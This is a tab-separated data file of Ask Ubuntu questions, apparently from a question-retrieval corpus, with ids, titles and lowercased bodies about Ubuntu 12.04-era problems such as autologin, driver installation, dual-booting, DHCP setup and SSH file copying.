162562	no 12.04 login after locking user account setting on autologin	i run 12.04 with gnome-classic . i wanted to get autologin since i am the only user . i unlocked the user account gui under settings , switched the slider to on , then locked the giu . since then a reboot stops at stopping system v runlevel compatibility . pressing ctrl+alt+f1 then gives me a command-line login . typing startx starts unity instead of gnome . in that , i can not unlock the user accounts gui under settings to set the autologin slider back to off .
162564	how can i tell if my system was booted as efi/uefi or bios ?	how do i determine whether a particular running ubuntu system was booted using efi/uefi , or bios ?
162568	libgl1-mesa-glx is not configured yet	since my sudo apt-get upgrade today i have this weird error ( s ) in the end of each software installation with apt-get , for instance : $ apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : liblzo2-2 uswsusp use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libglu1-mesa the following new packages will be installed : libglu1-mesa 0 upgraded , 1 newly installed , 0 to remove and 10 not upgraded . 1 not fully installed or removed . need to get 0 b/165 kb of archives . after this operation , 561 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously deselected package libglu1-mesa . ( reading database ... 140491 files and directories currently installed . ) unpacking libglu1-mesa ( from ... /libglu1-mesa_7.10.2-0ubuntu2.1_amd64.deb ) ... setting up libgl1-mesa-glx ( 7.10.2-0ubuntu2.1 ) ... update-alternatives : error : alternative link /usr/lib/xorg/extra-modules is already managed by x86_64-linux-gnu_gl_conf . dpkg : error processing libgl1-mesa-glx ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of libglu1-mesa : libglu1-mesa depends on libgl1-mesa-glx | libgl1 ; however : package libgl1-mesa-glx is not configured yet . package libgl1 is not installed . package libgl1-mesa-glx which provides libgl1 is not configured yet . dpkg : error processing libglu1-mesa ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libgl1-mesa-glx libglu1-mesa e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does anyone know how to repair that ? i have tried apt-get purge or apt-get install on 'these ' packages back did not help .
162571	is there a way to specify a global look and feel for swing apps ?	every time i install netbeans on ubuntu , i have to edit the ./etc/netbeans.conf file to include an option specifying the look and feel ; otherwise , the menus are all black on dark gray , which is impossible to use . is there a way to specify a global look and feel for swing apps , so that this is n't such a pain ? here is the line i have to change : 46 : netbeans_default_options= '' -j-client -j-xss2m -j-xms32m -j-xx : permsize=32m -j-dapple.laf.usescreenmenubar=true -j-dapple.awt.graphics.usequartz=true -j-dsun.java2d.noddraw=true -j-dsun.zip.disablememorymapping=true '' becomes : 46 : netbeans_default_options= '' -- laf com.sun.java.swing.plaf.nimbus.nimbuslookandfeel -j-client -j-xss2m -j-xms32m -j-xx : permsize=32m -j-dapple.laf.usescreenmenubar=true -j-dapple.awt.graphics.usequartz=true -j-dsun.java2d.noddraw=true -j-dsun.zip.disablememorymapping=true ''
162576	how to access svn from other machines	i have limited network knowledge , i followed this guide to install subversion on a ubuntu system with the latest version : http : //www.howtogeek.com/ ? post_type=post & p=195 i 've restarded the apache server and the computer is hooked on the school 's network . how do i figure out the svn url ? i think that right now it ca n't map to a domain so it 's using the localhost . to make it simple , what i want to do is write the svn url on another machine to access the data of the ubuntu server .
162579	how should an osd be coded with pygi ?	how is an osd meant to be coded , using pygobject ? is it just an undecorated window that is application-paintable ? please provide all the details that you can ( e.g . whether one has to use cairo , connect to the draw signal , ... )
162580	ftp via nautilus - can not paste files	i set ftp-bookmarks in nautilus this way : menu - > goto - > place in input typed : ftp : //username @ serveradress.de after connection and mounting succeed menu - > bookmarks - > add this works great in general ( while editing existing files ) , but i 'm not able to copy and paste files in the directories . every time i try , the ftp dir becomes dismounted and that fileoperation window appears which never completes , and which i ca n't close . nautilus is then using 100 % of cpu , so i kill it . when i then reconnect i can see that exactly one file was completely pasted , no matter if i tried to paste one or ten . i 'm not able to determine this behaviour on a specific server adress or filetype or filesize . i also do n't think that this could be related to the timeout problem of nautilus , because this also happens directly after mounting . any suggestions about that ? edit : i noticed that creating new documents inside the ftp directories does n't turn in this behaviour . it 's only on pasting or dropping files in . 2nd edit : this behaviour not occur by using sftp-connection . seems that this is a bug in the version of nautilus ( 2.32 ) provided by ubuntu natty which is restricted to ftp only .
162584	how can i enable international keyboards on 12.04 ?	i work in 3 different languages : swedish norwegian spanish ( latin america ) so far only the us english ( non-international keyboard works ) , i need at least the us-international keyboard to work as well as us standard .
162588	how do i install ubuntu and windows on separate hard drives ?	i just re-built my desktop . i have a brand new 2tb drive and i 'm also re-using a 250gb drive with windows xp installed . the problem is that the xp drive has a virus that was causing the computer ( before the re-build ) to reboot swiftly and unexpectedly after windows starts . i have yet to turn on my re-built computer ! i am currently not worried about losing the data on the xp drive . my desired end-result would be a re-image of xp on the 250gb drive and to install ubuntu 12.04 on the new 2tb drive . what order should i do things in order to get to that point ? i need to ( in some order ) : see that my new setup can post configure the new hardware re-image the 250gb drive with windows xp install ubuntu 12.04 on the 2tb drive ... without having the virus cause any more problems . understanding the reasoning behind the process would be very helpful . thanks !
162601	why does uploading a 16gb file to ubuntu one from browser on a mac fail ?	i 'm uploading a 16-gb file from a mac machine so i can access it later from my selectively synced ubuntu one . i created a ( not synced ) folder from the browser and started the upload there ; i see a moving stripe `` loading ... please wait '' popup . when i log in from another tab or computer i do n't see any partial file or increase in total usage . i first tried this from firefox for 24 hours and then quit and tried safari but both appear to hang with the pop-up . is my file even uploading ? i definitely have enough available storage . is there any way to see the status of the upload ?
162602	how do i remove ubuntu , wipe hard drive and install windows xp ?	i have ubuntu 11.10 , but i want to remove it , format my hard drive and install windows xp , but when i try doing this from the windows installer it says that the hard drive ca n't be formated so i would like to do it from the ubuntu installer without installing it again . please help me thanks .
162603	how do i change system-wide font settings in kubuntu ?	how do i change the font/size for the icon captions , dolphin text , and window decoration text ? they all went from 12 point to 10 point after i installed kde updates on kubuntu 12.04 .
162606	mod_rewrite not working	for some reason i ca n't get mod_rewrite to work . i have it enabled and it is visible under phpinfo ( ) and i have the appropriate permissions enabled . what 's going on ? 000-default : < virtualhost *:80 > serveradmin **** @ gmail.com servername ****.com documentroot /var/www < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride all order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > here is my rewrite rule for checking ... rewriteengine on rewriterule ^index.php ? act= ( .* ) & p= ( . * ) $ site/ $ 1/ $ 2.html can anyone spot anything out of the ordinary ?
162611	why does tightvnc viewer lag in 12.04 ?	after installing ubuntu 12.04 ( tightvnc viewer version 1.3.9 ) i noticed that vnc is really slow ( latency ) even though i have a gigabyte network ethernet connection . i 'm running tightvnc viewer version 1.3.9 with the minimum graphics settings and its still horrible . i also notice that the linux arp command takes a little longer to respond then it did before when i was running 10.04 pc specs hp amd a8 vision gpu ( 4 cores 1.6 ghz ) 12 gb ram gigabit ethernet card
162612	how can i add an application to the list of open with applications ?	i installed komodo edit from a download ( was n't available in software center . ) i want to be able to open .php files in komodo , but when i right-click and choose open with other application , komodo does n't display anywhere in the list . how can i add it to the list ?
162613	which of these are ubuntu partitions i can safely delete from windows ?	i am trying to uninstall ubuntu by following these directions , but i have a question . which partitions do i delete ? i am assuming it is the three blank ones , but why would ubuntu have three partitions ? so i just wanted to make sure .
162616	should i upgrade to the `` mainline '' kernels ?	newer `` mainline '' versions of the kernel are available from the ubuntu kernel team , e.g . 3.4 and 3.5 , while ubuntu 12.04 is on 3.2 . what are the mainline kernels ? are they better than my existing kernel ? what are the pros and cons of upgrading to a mainline kernel ? will i easily be able to go back ?
162624	i get an authentication failed message when i try to remove or install software	whenever i try to install or remove software i end up getting an authentication failed message . i 've already entered my password and it tells me authentication failed . i do know my password but for some reason it does n't take it my log in and key ring are the same password , mainly since i 'm the only one in my family who 's comfortable with linux . foxxy_gunmage @ rei-ayanami : ~ $ sudo ls [ sudo ] password for foxxy_gunmage : sorry , try again . [ sudo ] password for foxxy_gunmage : sorry , try again . [ sudo ] password for foxxy_gunmage : sorry , try again . sudo : 3 incorrect password attempts foxxy_gunmage @ rei-ayanami : ~ $ groups foxxy_gunmage adm dialout fax cdrom floppy tape audio dip video plugdev fuse netdev lpadmin nopasswdlogin admin sambashare vboxusers powerdev foxxy_gunmage @ rei-ayanami : ~ $
162626	what are the minimum system requirements for lubuntu ?	will lubuntu work well on a dell dimension 4100 with these specifications : cpu : intel pentium iii memory : 384m hard drive capacity : 20g processor speed : 800mhz
162631	ubuntu 12.04 installer does not recognize drive partitions	i recently purchased a new hp pavilion hpe desktop running windows 7 . i am trying to install a dual-boot system with 12.04 . however , when i run the livecd i only get as far as the `` install '' window where you can select the partitions for your drives . on the bottom where it says `` device for boot loader installation '' i have `` /dev/sda '' and can not select any other devices . all the options to change the drives are greyed out , most likely because there are no drives in the window . i partitioned my largest drive using the tools within windows , then booted into the cd , but nothing shows up . i then used gparted to change the new space from unallocated to an /ext2 , and still nothing shows up . the installer does not recognize anything , but when i go into an ubuntu session and use the disk utility manager i can see the partitions i made . anything i do has to be done outside of the installer . i have no files on this new computer , so this is the perfect time to install a parallel os . i would like avoid completely reinstalling windows , however . i 've been over the forums many times , but all the answers i 've found have not worked for me . i also tried flagging the new , empty partition as boot , but that screwed windows up . also , the wubi installer hits the same point and quits . i know that the disk itself is fine because i just made another dual boot system on a gateway pc . this makes me think something within this computer is preventing the installer from `` seeing '' the drives . any help would be much appreciated ! edit in response : the main part of the partitioning window shows no partitions , everything is blank . there is no way to add partitions , and all the buttons are useless . i 've tried defragging my drive multiple times , and i also used the same disk to dual-boot another pc with no problems , so it 's not the disk , it 's definitely the computer .
162633	empathy fails to reconnect after awake from suspend	problem : whenever i suspend in 12.04 and awake my laptop , empathy does n't automatically reconnect and i always have to manually log off and log back in again . any fixes for this bug ? more details : running 12.04 and whenever i suspend/hibernate/close laptop lid , when i restore my session , empathy is never able to reconnect . in the accounts settings it says `` failed to retrieve your personal information from the server '' if i disable and re-enable my account , then it logs back in no problem , but i have to do this little work around every single time i resume from a suspend/hibernate . is there any way to fix this so that empathy automatically reconnects ? thanks for any help in advance . the account in question is a facebook account ( its the only protocol i use )
162634	network printer problem with 12.04	i had an hp laserjet 3030 printer connected to an ubuntu box . it worked fine with 11.10 . i was able to print from ubuntu as well as from windows and mac from the home network . about a month or so ago , i upgraded 11.10 to 12.04 , then things started to falling apart . my windows 7 laptop could n't print to the printer any more . today , i installed many updates on 12.04 , hoping that would fix the printing problem . unfortunately , it made the situation much worse . now not only my windows 7 laptop wo n't print , my xp desktop wo n't print either . every time i print something from the windows computer , the ubuntu box logs an error message in /var/log/samba/log . 'machinename ' as : _spoolss_openprinterex : can not open a printer handle for printer \\server . it is interesting that it uses the server name as the printer , not the \\server\xyzprinter as the printer name . anyone had a similar problem ? anyway to work around the problem ?
162639	how do i get ubuntu to recognize my nvidia graphics card ?	if i type lspci| grep vga into the terminal i get this output : 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0fd1 ( rev a1 ) when i install nvidia-current it installs 259.49 which is the wrong driver for the 650m ( 259.59 is the correct ) . any thoughts ? edit : i employed this command dpkg -- list | egrep ' ( nvidia|bumbl ) ' | grep ^ii which output ii bumblebee 3.0-2~preciseppa1 nvidia optimus support ii bumblebee-nvidia 3.0-2~preciseppa1 nvidia optimus support using the proprietary nvidia driver ii nvidia-common 1:0.2.44 find obsolete nvidia drivers ii nvidia-current 295.40-0ubuntu1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 295.33-0ubuntu1 tool of configuring the nvidia graphics driver so i guess this shows that since it has no idea which card it is , it does n't pick the right drivers ... also the computer is a samsung series 7 ( 700z7c ) if that helps running optirun glxspheres gives this output in kern.log nvrm : gpu at 0000:01:00.0 has fallen off the bus . nvrm : gpu at 0000:01:00.0 has fallen off the bus . nvrm : rminitadapter failed ! ( 0x26:0xffffffff:1170 ) nvrm : rm_init_adapter ( 0 ) failed
162646	how do i install ubuntu on an hp laptop with four primary partitions ?	i have a hp pavilion g6 laptop . my drive already has 4 partitions on it , stock . i made a new 70 gig partition and try to make a new simple volume and it says it has to make it a dynamic disk . i am trying to dual boot windows 7 and ubuntu . the 4 stock partitions are : system ( c : ) recovery ( d : ) hp_tools ( e : ) .
162658	ssh navigation confusion	this may be the most ridiculous question i 've ever asked , but i freely admit that i am stumped . i 'm trying to move some files from a remote server to my local machine . i 'm running ubuntu , obviously . now , just for background this machine has two different users . i 'm logged in as one of them ; joe . so when i click the home folder in unity i get my joe home folder with all of my sub folders and files . one of the folders that i have inside joe is called remote . inside remote is another folder named mail . i have no problem logging into the remote server using either openssh or putty , but i can not copy the files to joe/remote/mail . for some reason i keep getting the path wrong and i have tried every variation that i can think of . a partial list would be ... /joe/remote/mail /remote/mail ~/joe/remote/mail ~/remote/mail remote/mail joe/remote/mail /home/remote/mail /home/joe/remote/mail /local/home/joe/remote/mail /local/joe/remote/mail /local/remote/mail you get the idea . everything i try comes up with the same error : folder xxxx does not exist . i guess what i 'm asking here is just what , exactly , does openssh and putty think is the current directory on the local machine ? i have searched online documentation and have found nothing that tells me this simple and infinitely usable piece of information . also , i went ahead and copied the files using `` . '' as the destination , which should copy them to the current directory on the local machine . it worked ! but ... where are they ? they are n't in root . they are n't in home . they are n't in joe . i 'm lost . edited to add that i am using scp to copy the files , if that matters .
162666	graphics driver showing vesa : broadway with amd catalyst driver installed	i recently installed ubuntu 12.04 as a fresh install . i followed the unofficial wiki to install the amd catalyst driver version 12.4 from source . in gnome3 under 'all settings ' 'details ' 'graphics ' is shows driver as vesa : broadway . is this correct ? fglrxinfo shows : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 5800 series opengl version string : 4.2.11631 compatibility profile context xorg.conf show the fglrx driver being used : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1680x1050 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1680x1050 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1680 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' option `` monitor-dfp1 '' `` 0-dfp1 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -1 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 3360 1920 depth 24 endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -1 '' device `` amdcccle-device [ 1 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection running gfl_glxgears shows a 3d rotating cube . how can i confirm gnome is using the correct driver ? any assistance appreciated .
162672	unable to run gedit as a different user	i login as user 'foo ' and if i am able to run gedit and edit files in my ubuntu 12.04 machine with a display setting as :0 if i `` su - bar '' and then try to edit files , i get a no protocol specified error and it does n't open the necessary files . what coule be the problem here ?
162677	can i make changes or fix bugs in my app after the app showdown is over ?	is it allowed to make changes , like bug fixes after the deadline 09.07.2012 of the apps which are hosted on launchpad for the ubuntu app showdown ? i did not updated anything with quickly release or quickly submitubuntu because i do n't want to be disqualified for the contest . i think it would be better to to allow ( only ) bug fixes , because i think the users of the apps would like to have a high quality software , with no bugs , available in the ubuntu software center .
162679	why ca n't i install ubuntu to dual-boot on the hp pavilion dm1 laptop ?	how come i do n't get the automatic partition slider when i attempt to install ubuntu 12.04 alongside windows 7 on this machine ? http : //www.gadgetreview.com/2011/07/hp-pavilion-dm1z-lm829av-11-6-inch-notebook-370-after-coupon-code.html i have tried installation from a usb as well as cd . i tried installing ubuntu 11.10 as well . i have futilely tried to manually partition the drive using info posted in the forums - 4 times . each time , i just ended up spending countless hours reinstalling windows 7 ! hence , i would greatly appreciate it if someone out there in ubuntu land can post a wiki on how to access the partition slider when installing ubuntu 12.04 alongside windows 7 on this machine ! alternatively , perhaps someone can post a partition scheme that will work on this machine ? when i installed ubuntu on my other laptop , the slider came up and partition was easy as pie ! thanks in advance to whoever can help me solve this ! ! !
162686	how do i dual-boot windows by default ?	i am new to ubuntu , but have used macs and pcs for years . i am referencing the idea of how on a mac , and you install boot camp , how mac automatically runs by default , and you can run windows by holding down the option key . i will be mainly using windows , and i do n't want to have to choose windows or wait for it to time out by default . i can then press a secondary key , or something similar to boot ubuntu . how do i accomplish this ?
162689	when trying to wget openfire 3.7.1 it doesnt download the right file	when trying to do a wget for openfire . it does n't download the actual file it should be getting . when i did a vi on the file . it contained the following ; '' tar.vim version v28 `` browsing tarfile /download-landing.jsp ? file=openfire % 2fopenfire_sr `` select a file with cursor and press enter gzip : /download-landing.jsp ? file=openfire % 2fopenfire_src_3_7_1.tar.gz tar : this does not look like a tar archive tar : exiting with failure status due to previous errors why does n't wget get the right file ?
162695	setup dhcp server for lan party	i will host a lan party next week where we will create am isolated lan without internet connection . since i do not want to set up static ips on some 8 computers , i thought about setting up a dhcp server on my computer . i found that there is the dhcp3-server . the problem probably is that the dhcp server then will run all the time , causing problems when i am in another network . how can i set it up so that i just fire it up at the lan party ? i use kubuntu with kde , if that makes any difference . okay , i have the dhcp server installed , but it does not start up . i attached the output of some commands , configuration files /etc/dhcp/dhcpd.conf ddns-update-style none ; option domain-name `` example.org '' ; option domain-name-servers ns1.example.org , ns2.example.org ; default-lease-time 600 ; max-lease-time 7200 ; log-facility local7 ; subnet 192.168.100.0 netmask 255.255.255.0 { range 192.168.100.100 192.168.100.200 ; } /etc/default/isc-dhcp-server interfaces= '' eth0 '' ifconfig eth0 link encap : ethernet hwaddr f0 : de : f1 : de : a2:90 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f2500000-f2520000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2830 errors:0 dropped:0 overruns:0 frame:0 tx packets:2830 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:405626 ( 405.6 kb ) tx bytes:405626 ( 405.6 kb ) wlan0 link encap : ethernet hwaddr 10:0b : a9 : bf : e8 : fc inet addr:131.220.201.217 bcast:131.220.207.255 mask:255.255.248.0 inet6 addr : fe80 : :120b : a9ff : febf : e8fc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:43878 errors:0 dropped:0 overruns:0 frame:0 tx packets:27630 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:52123963 ( 52.1 mb ) tx bytes:2967812 ( 2.9 mb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 131.220.207.254 0.0.0.0 ug 0 0 0 wlan0 131.220.200.0 0.0.0.0 255.255.248.0 u 2 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 service isc-dhcp-server status isc-dhcp-server stop/waiting dhcpd internet systems consortium dhcp server 4.1-esv-r4 copyright 2004-2011 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ wrote 0 leases to leases file . no subnet declaration for wlan0 ( 131.220.201.217 ) . ** ignoring requests on wlan0 . if this is not what you want , please write a subnet declaration in your dhcpd.conf file for the network segment to which interface wlan0 is attached . ** not configured to listen on any interfaces ! dhcpd eth0 internet systems consortium dhcp server 4.1-esv-r4 copyright 2004-2011 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ wrote 0 leases to leases file . no subnet declaration for eth0 ( no ipv4 addresses ) . ** ignoring requests on eth0 . if this is not what you want , please write a subnet declaration in your dhcpd.conf file for the network segment to which interface eth0 is attached . ** not configured to listen on any interfaces !
162696	how to easily delete snippets using kdenlive ?	i 'm using kdenlive to edit some video i recorded . i have some `` uh '' s , `` um '' s , and dead air i want to delete quickly . for every little bit i need to remove , i 'm having to : select track set end cutting point cut clip ( shift+r ) set start cutting point cut clip ( shift+r ) select portion to delete press delete right-click in empty area click `` remove space '' this is a real pain . : - ( i 'm used to cinelerra , where you just click-drag a selection , then press delete . unfortunately , the codecs in cinelerra are sorely out of date . how can i speed this process up in kdenlive ?
162700	how can one disable shortcuts of chrome ?	have you observed that google-chrome has approximately 29 shortcuts . ( ctrl-a ... z ) i really hate these things . anyway , my questions : how can i disable some of the shortcuts ? are there any files where all settings are stored ? if there are , where are those files in ubuntu 12.04 ?
162701	vmware installation on ubuntu 10.04	i installed vmware 8.04 on ubuntu 10.04 . when i run the vmware workstation , it shows the message like '' before you can run vmware , several modules must be compiled and loaded into the running kernel '' . please help me how to solve this .
162711	gdm crashes in ubuntu 11.04 natty narwhal	i use ubuntu 11.04 and it crashes every once in a while . i 'm not sure what 's wrong . i use unity . i tried gnome classic and even xfce but it randomly crashes at times . has been a very horrible experience . can someone explain me what 's wrong ? most of the times i ll be using eclipse . and i did not find anything bad in syslogs but i find these in my gdm logs after every crash . ** ( process:1227 ) : debug : greeter session pid=1227 display=:0 xauthority=/var/run/gdm/auth-for-gdm-dau38g/database xfwm4-message : to replace the current window manager , try `` -- replace '' ( xfwm4:1235 ) : xfwm4-warning ** : another window manager is already running gdm-simple-greeter [ 1227 ] : gtk-warning : /build/buildd/gtk+2.0-2.24.4/gtk/gtkwidget.c:5687 : widget not within a gtkwindow window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0xc00033 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . gdm-simple-greeter [ 1227 ] : warning : unable to load ck history : no seat-id found window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0xc00033 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . ( gnome-power-manager:1231 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed window manager warning : currenttime used to choose focus window ; focus window may not be correct . window manager warning : got a request to focus the no_focus_window with a timestamp of 0 . this should n't happen ! ( gnome-settings-daemon:1164 ) : libappindicator-warning ** : unable to send signal for newstatus : the connection is closed has anyone faced similar issues ?
162713	when i run android sdk from terminal , it shows error . how to fix it ?	exception in thread `` main '' java.lang.unsatisfiedlinkerror : no swt-gtk-3550 or swt-gtk in swt.library.path , java.library.path or the jar file at org.eclipse.swt.internal.library.loadlibrary ( unknown source ) at org.eclipse.swt.internal.library.loadlibrary ( unknown source ) at org.eclipse.swt.internal.c. < clinit > ( unknown source ) at org.eclipse.swt.internal.converter.wcstombcs ( unknown source ) at org.eclipse.swt.internal.converter.wcstombcs ( unknown source ) at org.eclipse.swt.widgets.display. < clinit > ( unknown source ) at com.android.sdkmanager.main.showsdkmanagerwindow ( main.java:328 ) at com.android.sdkmanager.main.doaction ( main.java:316 ) at com.android.sdkmanager.main.run ( main.java:118 ) at com.android.sdkmanager.main.main ( main.java:101 )
162717	should i go with a vmware install or a wubi install ?	first off , no , i 'm not going to do the standard partitioning install . i 've gone through a few hours of dealing with boot managers that would n't install properly and accidentally temporarily `` breaking '' my machine , i can live with negligible performance decrease and the lack of a hibernate function . anyways , i 'm debating whether or not i should opt for the wubi installation or the vmware installation . specifically , here 's the factors that should influence my decision 1 ) i 'll be using it for lightweight computing , word processing , graphs , logs , data collection , maybe some programming , etc . ( i 'm a college student ) . so while i do n't need my full graphics potential or anything , i 'd like to have an installation that works as fast and efficient as possible , without hangups/stutters/etc . 2 ) i have a laptop with nvidia optimus ( switchable graphics ) . these graphics work properly through windows , and semi-properly through wubi ubuntu with the bumblebee utility . if optimus works a-ok in windows , will it work just as well in a virtual machine hosted by windows ? or will i have to find a way to get bumblebee working with the vm installation ? 3 ) i have 6gb of ram , which is a good quantity and can nullify the memory deficiency that having windows 7 and ubuntu running at once could cause . however , i want to use absolutely no swap space if possible . in addition , will having windows 7 running in the background affect my cpu 's processing power vs. wubi ? 4 ) i heard somewhere that 3d graphics can be iffy with vmware . i 'd like to have a 3d desktop environment with effects included . will this be as possible with vmware as it is with wubi ? 5 ) is running ubuntu in a vm going to make my computer more vulnerable as opposed to a dual-boot through wubi ? i like ubuntu 's tight security , and i 'm not sure if running it within windows ' less tight environment would affect it . in general , i want something that works without a hitch , and runs and looks sleek . while i 'd love the ability to switch between 7 and ubuntu with the press of a button so i could do more windows-specific things such as ms office and gaming , the whole idea of running a whole operating system inside of another operating system seems questionable . if the security and performance cost of running it in a vm is too high , then i 'll stick with wubi , but i really do like the idea . addition - ca n't believe i forgot this . i 'm running a laptop in a university setting , so battery life is going to be a huge deal for me . i imagine that the virtual machine will require more power to run , but will this be a noticeable and significant difference ?
162718	quickly creates wrong debian/copyright file	i have some problem with quickly submitubuntu command . the reviewer of my application send me a feedback asking to change the copyright file because it was in a wrong format and with errors ... it is `` protoborsa '' application https : //myapps.developer.ubuntu.com/dev/apps/1152/feedback/ i edited the file debian/copyright and i did `` quickly submitubuntu '' again.. but i thinks , quickly trashed my changes and create a new wrong copyright file . this is the file http : //paste.ubuntu.com/1087559/ ( the duplicate line , for example that property close tag comes from .ui glade files ... from an aboutdialog ) is it possible to force quickly to do n't touch the copyright file ? or.. how do quickly generate this file ? ( with quickly package -- extras , debuild -s , and dput than.. i have same results ) .
162722	how can i enable autologin for my user account when the option is not there ?	i 'm running a fairly clean install of 12.04 . i have n't really installed much software , only vmware tools as i 'm running it on a windows host using vmware workstation . i am trying to enable automatic login just to save some time more than anything else . if i go to system settings > user accounts i can see my user account in the list but no option to enable automatic login . even if i unlock it still does not show it . if i create a new user account the auto login option is displayed for that user account only . if i assign a password then i can enable the auto login option . as well as a 'standard ' user i also tried creating an 'administrator ' account to see if it would work and it does . any thoughts anyone ? edit : as a quick test i decided to see if creating a new administrator account and logging into it would make the auto-login available for my admin account . it does , so i tried unlocking and switching auto-login on . however when i rebooted it did not auto-login , and just went to the login screen as normal . is it a security feature of ubuntu or something to not allow auto-login for administrator accounts because of the security risks ? edit2 : if i create a new administrator account , assign a password and enable auto-login it works as intended . something else i noticed is that when it carried out the auto-login for the new account it automatically executed /usr/bin/vmware-user which enables vmware tools features like auto-resizing of desktop etc . this does not get executed automatically when i log in to my original account ( i have just always worked around that seemingly separate issue by adding it as a startup application ) . i would guess this means that the real issue is something to do with my user account rather than a problem with lightdm . edit3 : i have now fixed this . apparently i have to wait for another 4 hours before i 'm allowed to answer my own question because i 'm a new user ... .answer will be posted then .
162723	hang during unlock , slow after that	i have problems when i leave computer on during the night , when i resume it in the morning , it becomes very slow , i often wait for few minutes until login form renders , when i login , apps freeze randomly and i must restart it in order to work normally . what can be the problem ?
162724	installed xubuntu desktop on ubuntu 12.04 server and now ca n't connect via ssh	i have a ubuntu 12.04 server that i could connect to fine using ssh over the internet . i installed the xubuntu desktop on it , did n't change any settings , then suddenly ssh stopped working . i can connect locally using `` ssh localhost '' i ca n't connect if i type `` ssh ( public ip address ) '' i can connect using a different computer on the same local network like `` ssh 192.168.2.5 '' i double checked to make sure the ports are forwarded correctly , when i use a online port checking tool i can confirm that port 22 is open . i confirmed that the firewall is off using `` sudo ufw disable '' any other ideas what it might be ? should i just reinstall ubuntu server or is there a obvious thing i 'm missing ? any help appreciated or just send me in the right direction , i do n't mind reading to figure it out but i do n't know where to start , thanks ! ! !
162725	are libc versions tied to kernel versions ?	after reading the answers to my previous question i have come to the conclusion that an answer to the following question is what i was actually looking for : does a particular version of the kernel require a particular version of libc to run properly ? basically my problem stems from building an application on my 12.04 ubuntu and trying to run it on 8.04 . i have since learned from this and other stackexchange forums that it is backward compatibility of libc that causes these problems . therefore what i am perhaps naively trying to do is build the same version of libc that exists on my target and then link against that on my host when i build the application . then in an ideal world when i copy this to the host , having been linked to the `` correct '' libc it should work ( in my head at least ) . i have been totally unable to find a way to install an older libc on my system , and wondered if each version is tightly bound to a kernel version , hence the above question .
